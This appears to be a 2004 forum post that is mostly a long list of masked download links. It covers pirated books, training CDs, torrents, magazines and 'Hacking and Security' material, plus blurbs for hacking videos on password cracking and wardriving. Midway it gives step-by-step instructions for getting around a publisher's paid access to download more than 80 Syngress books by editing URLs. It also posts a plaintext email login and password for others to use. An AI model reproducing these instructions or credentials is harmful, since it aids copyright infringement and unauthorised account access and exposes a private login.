Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link hm

Only the registered members can see the link ON.chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link chm

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link
================================================== =================================================
Only the registered members can see the link

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link [Arabic Book]

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link

Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link

Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link

Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link

Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link

Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link

Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link

Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link

Only the registered members can see the link
================================================== =================================================
Total Training for Photoshop 7.0 - (9 CDs)
1- Download "BitTorrent" from (Only the registered members can see the link).
Install CD 310.4 Mb
Only the registered members can see the link(6).torrent
CD1 667.7 Mb
Only the registered members can see the link(2).torrent
CD2 673.2 Mb
Only the registered members can see the link(3).torrent
CD3 725.7 Mb
Only the registered members can see the link(2).torrent
CD4 686.4 Mb
Only the registered members can see the link(2).torrent
CD5 295.1 Mb
Only the registered members can see the link(3).torrent
CD6 711.1 Mb
Only the registered members can see the link(2).torrent
CD7 706.2 Mb
Only the registered members can see the link(3).torrent
CD8 319.5 Mb
Only the registered members can see the link(2).torrent

================================================== =================================================

New Updates:
------------------

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

ftp://195.222.134.71/Bookz/Other/

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link [all about Cisco]

Only the registered members can see the link [CCIE books]

Only the registered members can see the link [CCIP books]

Only the registered members can see the link [CCSP books]

Only the registered members can see the link [CISCO IP telephony]

Only the registered members can see the link [MPLS books]

Only the registered members can see the link [QOS books]

Only the registered members can see the link [many simulations]

Only the registered members can see the link [telephony specializations books]

Only the registered members can see the link [BCCRAN books]

Only the registered members can see the link [CCNP books]

Only the registered members can see the link [password recovery books]

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link [alllllllllllllllllllllllllllllllllll Oreilly books]

Only the registered members can see the link [programming books]

Only the registered members can see the link [The code Linux]

Only the registered members can see the link [download many operating systems]

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Hacking and Security]

Only the registered members can see the link [Java Books]

Only the registered members can see the link [Java Books]

Only the registered members can see the link [Java Books]

Only the registered members can see the link [Java Books]

Only the registered members can see the link [Java Books]

Only the registered members can see the link [Java Books]

Only the registered members can see the link [Java Books]

Only the registered members can see the link [Java Books]

Only the registered members can see the link [Java Books]

Only the registered members can see the link [Java Books]

Only the registered members can see the link [Java Books]

Only the registered members can see the link

Only the registered members can see the link SIGN/

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link [Photoshop Videos]

Only the registered members can see the link [excellent arabic tutorial site]

Only the registered members can see the link

Only the registered members can see the link

Only the registered members can see the link
================================================== ===========================

Magazines:
--------------

PC Magazine - Nov-02-04
Only the registered members can see the link

Popular Science - Oct-04;
Only the registered members can see the link

Electronic Gaming Monthly - Dec-04; Only the registered members can see the link

Personal Computer World - Nov-04; Only the registered members can see the link

Computer Gaming World - Nov-04; Only the registered members can see the link

Better Software - Oct-04; Only the registered members can see the link

Internet Works - Nov-04; Only the registered members can see the link

CIO Insight - Oct-04;
Only the registered members can see the link

Digital Camera World - Nov-04; Only the registered members can see the link

Talk Middle East - Oct-04; Only the registered members can see the link

Laptop Magazine - Sep-04; Only the registered members can see the link

Microsoft Windows XP - Dec-04; Only the registered members can see the link

PC Answers - Nov-04;
Only the registered members can see the link

CosmoGIRL - Oct-04;
Only the registered members can see the link

Seventeen - Nov-04;
Only the registered members can see the link

Mobile PC - Nov-04;
Only the registered members can see the link

PC Magazine (UK) - Sep-04; Only the registered members can see the link

Dynamic Graphics - Oct-Nov-04; Only the registered members can see the link

Only the registered members can see the link [Zinio Reader]
================================================== ===========================

The Broken Videos:
-------------------------

Code:
Only the registered members can see the link


Video Release 0003: return of thebroken
We kick it off with Windows password hash extraction and cracking. Also learn the basics of modding the Xbox, PS2 and GameCube. Plus, Ramzi’s back with a mission: impossible self-destructing laptop. And we sit down with Kevin Mitnick to find out what life is like for a hacker in prison.
Encoded: DivX Runtime: 31:33 Size: 152MB
Download Mirrors:
Code:
Only the registered members can see the link
Only the registered members can see the link


Video Release 0002: Hacking with Ramzi "door buster"
If you've ever watched an episode of "Cops", then you've probably seen a door battering ram in use. Now Ramzi shows you how to build a door buster for your own home use. For only $20 in parts from your local Home Depot, the door's history.
Encoded: DivX Runtime: 05:39 Size: 27.3MB
Download Mirrors:
Code:
Only the registered members can see the link
Only the registered members can see the link


Video Release 0001: Enter thebroken
Our first episode jumps right into wardriving and wap hacking. Also learn the basics of social engineering with "free pizza 4 life". And of course, a hacker tip with Ramzi.
Encoded: DivX Runtime: 17:00 Size: 82.1MB
Download Mirrors:
Code:
Only the registered members can see the link
Only the registered members can see the link
================================================== ===========================

Free trick for downloading the famous [Syngress Books] more than "80" books:
---------------------------------------------------------------------------------------------

1- Go to the web site [Only the registered members can see the link].
2- Click on [create an account] at upper right hand side of screen to register for free.
3- Enter any garbage information in all fields in the registration.
4- Once you are registered, enter the following URL: [Only the registered members can see the link], and replace the "XXXX" with the code of the book. For example, to download "70-290 Study Guide", use the URL: "Only the registered members can see the link".

5- Codes of books:

CODE BOOK NAME
175_Net_mobile_web - .NET Mobile Web Developer's Guide
230_lgo_ris2 - 10 Cool Lego Mindstorm Robotics Invention System 2 Projects
229_lgo_ubp - 10 Cool LEGO Mindstorm Ultimate Builder Projects
227_lgo_dsdk - 10 Cool Lego Mindstorms Dark Side Robots
24670214 - 70-214 Study Guide
274_MCSE_70290 - 70-290 Study Guide
254_MCSE_70291 - 70-291 Study Guide
271_MCSE_70292 - 70-292 Study Guide
255_MCSE_70293 - 70-293 Study Guide
272_MCSE_70296 - 70-296 Study Guide
110_Avd_App - Administering Cisco QoS in IP Networks
130_mig_asp - ASP Configuration Handbook
166_asp_dev - ASP.NET Web Developers Guide
253_BD_Cisco_Intrntwkg - Best Damn Cisco Internetworking Book Period
252_BD_Firewall - Best Damn Firewall Book Period
145_biztalk - BizTalk Server 2000
160_bluetooth - Bluetooth Application Developer's Guide
169_cisco_wlan - Building a Cisco Wireless LAN
71_Conf_CNSAD_Win2000 - Building Cisco Networks for Windows 2000
93_sbcran - Building Cisco Remote Access Networks
250_DMZs - Building DMZs for Enterprise Networks
174_lego_robo - Building Robots with Lego Mindstorms
140_san_broc - Building SANs with Brocade Fabric Switches
223_C_Java - C# for Java Programmers
167_C# - C#.NET Web Developer's Guide
ccna_superpack - CCNA Super Pack
192_chk_pt - Check Point Next Generation Security Administration
259_chkpt - Check Point NG VPN-1/FireWall-1
109_ciscoip - Cisco AVVID & IP Telephony Design and Implementation
267_cssp_ids - Cisco Security Professional's Guide to Secure Intrusion Detection Systems
235_pix - Cisco Security Specialist's Guide to PIX Firewalls
189_xp - Configuring and Troubleshooting Windows XP Professional
94_avvid - Configuring Cisco Avvid
70_voip - Configuring Cisco Voice Over IP
228_VOIP2E - Configuring Cisco Voice Over IP, Second Edition
111_ctrx - Configuring Citrix Metaframe for Windows 2000 Terminal Services
220_CitrixXP - Configuring Citrix MetaFrame XP for Windows Including Feature Release 1
128_mc_em - Configuring Exchange 2000 Server
208_ipv6 - Configuring IPv6 for Cisco IOS
132_isa - Configuring ISA Server 2000
245_symntc - Configuring Symantec AntiVirus Enterprise Edition
68_Win2000_Sec - Configuring Windows 2000 Server Security
147_w2K_noad - Configuring Windows 2000 Without Active Directory
165_cell - Consumer's Guide to Cell Phones & Wireless Service Plans
73_odba - DBA's Guide to Databases on Linux
92_Win2000_Deploy - Deploying Windows 2000 with Support Tools
152_wan_luc - Designing a Wireless Network
114_SQL_Dna - Designing SQL Server 2000 Databases for .net Enterprise Servers
206_XML_Web - Developing .NET Web Services with XML
210_Java_APIs_dev - Developing Web Services with Java APIs for XML Using WSDP
226_InfoWar - Dr. Tom Shinder's ISA Server and Beyond
119_email - E-mail Virus Protection Handbook
193_hck_cf5 - Hack Proofing ColdFusion
138_hack_lnx - Hack Proofing Linux
158_hack_sun - Hack Proofing Sun Solaris 8
181_hackproofW2K - Hack Proofing Windows 2000 Server
224_hack_xml - Hack Proofing XML
134_hack_ecomm - Hack Proofing Your E-commerce Site
221_hck_identity - Hack Proofing Your Identity in the Information Age
194_Hck_net2e - Hack Proofing Your Network, Second Edition
95_hack - Hack Proofing Your Network: Internet Tradecraft
137_hack_app - Hack Proofing Your Web Applications
182_Hack_wireless - Hack Proofing Your Wireless Network
287_HRD_HCK - Hardware Hacking
69_ipad - IP Addressing and Subnetting: Including IPv6
190_Journey_Internet - Journey to the Center of the Internet
243_lgo_mstr - LEGO Mindstorms Masterpieces
240_lgo_tools - Lego Software Power Tools
76_Mng_ActDir_Win2000_Ser - Managing Active Directory for Windows 2000 Server
112_ipsec - Managing Cisco Network Security
218_CiscoSec2e - Managing Cisco Network Security Second Edition
75_Mng_Win2000_NetServs - Managing Windows 2000 Network Services
115_mc_sec - Mission Critical! Internet Security
113_MC2k - Mission Critical! Windows 2000 Server Administration
234_nokia - Nokia Network Security Solutions Handbook
139_palm_dev - Palm OS Web Application Developers Guide
177_lego_JAVA - Programming Lego Mindstorms with Java
183_Ruby - Ruby Developer's Guide
225_Cybercrime - Scene of The Cybercrime: Computer Forensics Handbook
286_NSA_IAM - Security Assessment Case Studies for Implementing the NSA IAM
236_secplus - Security+ Study Guide
219_sniffer - Sniffer Pro Network Optimization & Troubleshooting Handbook
244_snort - Snort 2.0 Intrusion Detection
232_SpecialOps - SPECIAL OPS: Host and Network Security
241_sscp - SSCP Study Guide
249_STL_NTW - Stealing the Network: How to Own the Box
91_Win2000_TCPIP - Troubleshooting Windows 2000 TCP/IP
153_vb_net - VB.NET Developer's Guide
159_wg_wi - Webmaster's Guide to the Wireless Internet
180_AD_2e - Windows 2000 Active Directory Second Edition
77_Win2000_Conf_Wiz - Windows 2000 Configuration Wizards
74_Sysad - Windows 2000 Server System Administration Handbook
155_xml_NET - XML .NET Developer's Guide

6- For quick downloading, use my account and password:
User Name: [mhany@virgitech.com]
Password: [poiuytrewq]

================================================== ===========================

Huge excellent arabic links for books and tutorials:
-------------------------------------------------------------

** البرمجه **

اسم الكتاب : البرمجه الكائنيه
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link
_________________
Best Regards,
Mahmoud Hany,
Country: Egypt,
Title: IT instructor,
Mobile: 0106354485

View user's profile Send private message
blackwood
Kiddie
Kiddie


Joined: 21 Sep 2004
Posts: 22
Location: Egypt

PostPosted: Thu Nov 18, 2004 1:21 pm Post subject: Continue........... Reply with quoteBack to top
Huge excellent arabic links for books and tutorials:
-------------------------------------------------------------

** البرمجه **

اسم الكتاب : البرمجه الكائنيه
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب برمجة السي
لغة البرمجه: C /السي
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : برمجة السي - دروس
لغة البرمجه: C /السي
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : برمجة الأسمبلي
لغة البرمجه: الأسمبلي/ Assembley
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : برمجة الأسمبلي
لغة البرمجه: الأسمبلي/ Assembley
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : موسوعة البرمجة بال ++C
لغة البرمجه: السي بلس بلس/ ++C
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : طريق البرمجة في ++C
لغة البرمجه: السي بلس بلس/ ++C
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تعلم البرمجة بواسطة MFC
لغة البرمجه: MFC وال++C
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الفجوال بيسك دوت نت
لغة البرمجه: الفجوال بيسك . نت VB.NET
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : إحتراف الفجوال بيسك دوت نت
لغة البرمجه: الفجوال بيسك . نت VB.NET
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : واجهة برمجة التطبيقات(API)
لغة البرمجه: الفجوال بيسك 6 VB
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : برمجة الوسائط المتعددة بإستخدام DirectX
لغة البرمجه: الفجوال بيسك 6 VB
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : فجوال بيسك للجميع
لغة البرمجه: الفجوال بيسك 6 VB
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : التعامل مع مسجل النظام
لغة البرمجه: الفجوال بيسك 6 VB
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب رائع للفجوال بيسك
لغة البرمجه: الفجوال بيسك 6 VB
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تعلم الفجوال بيسك 6 للمبتدئن
لغة البرمجه: الفجوال بيسك 6 VB
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : قواعد البيانات في الفجوال بيسك 6
لغة البرمجه: الفجوال بيسك 6 VB
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : التعامل مع وسائط التخزين
لغة البرمجه: الفجوال بيسك 6 VB
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : التعامل مع قواعد البيانات
لغة البرمجه: SQL
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الأساسيات في التعامل مع قواعد البيانات
لغة البرمجه: عام
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : مايكروسوفوت آكسيس
لغة البرمجه: Microsoft Access
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تعليم آكسيس 1
لغة البرمجه: Microsoft Access
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تعليم آكسيس 2
لغة البرمجه: Microsoft Access
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ


** برمجة المواقع **

اسم الكتاب : دورة في الإتش تي إم إل
لغة البرمجه: HTML
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : المرجع الكامل في ال HTML
لغة البرمجه: HTML
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تعلم ال PHP بسهولة
لغة البرمجه: PHP
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تعلم ال PHP
لغة البرمجه: PHP
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تعرف على ال PHP وال MYSQL
لغة البرمجه: PHP - MYSQL
الــتتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : برمجة الـ ASP
لغة البرمجه: ASP
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : برمجة المواقع بالفلاش
لغة البرمجه: FLASH Action Script
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : مقدمه نحو جافا سكربت
لغة البرمجه: Java Script
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب متميز في تعليم الجافا سكربت
لغة البرمجه: Java Script
الــــتحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : برمجة الإستايل
لغة البرمجه: CSS
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب متميز في تعليم الجافا سكربت
لغة البرمجه: Java Script
الــــتحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : برمجة الإستايل
لغة البرمجه: CSS
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ


** الجرافيكس والتصميم **

اسم الكتاب : الفوتوشوب للمحترفين 1
لغة البرمجه: PhotoShop
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الفوتوشوب للمحترفين 2
لغة البرمجه: PhotoShop
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الفوتوشوب للمبتداين
لغة البرمجه: PhotoShop
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كتاب رائع في الفرونت بيج
لغة البرمجه: FrontPage
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الفرونت بيج
لغة البرمجه: FrontPage
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : vBulletin تركيب منتدى
لغة البرمجه: vBulletin
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : PHPتركيب منتدى وتركيف سيرفر لل
لغة البرمجه: vBulletin & PHP
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الفلاش إم إكس MX
لغة البرمجه: Flash MX
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الشامل في فلاش
لغة البرمجه: Flash MX
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الاوتوكاد
لغة البرمجه: AutoCad 2000
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح السي بنل
لغة البرمجه: Cpanel
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : كيف يكون موقعك ناجحا
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تصميم الألعاب ببرنامج game maker
لغة البرمجه: Games
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ


** أنظمة التشغيل **

اسم الكتاب : نظام التشغييل Dos
لغة البرمجه: MS - DOS
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : تعليم نظام التشغييل Dos
لغة البرمجه: MS - DOS
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : موسوعة ويندوز 2000
لغة البرمجه: Windows 2000
الــتــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : مرشدك الأمين لإكتشاف الويندوز XP
لغة البرمجه: Windows XP
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : مشاكل بدئ التشغييل وكيفية تخطيها
لغة البرمجه: Windows
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : شرح عمل فورمات وتنصيب XP
لغة البرمجه: عام
الـتـــحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : دليل نظام التشغييل لينكس
لغة البرمجه: Linux
الـــتـحميـل: Only the registered members can see the link

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــــــــــــــــــ

اسم الكتاب : الأسئلة المتكررة في لينكس
لغة البرمجه: Linux
الــتــحميـل: Only the registered members can see the link

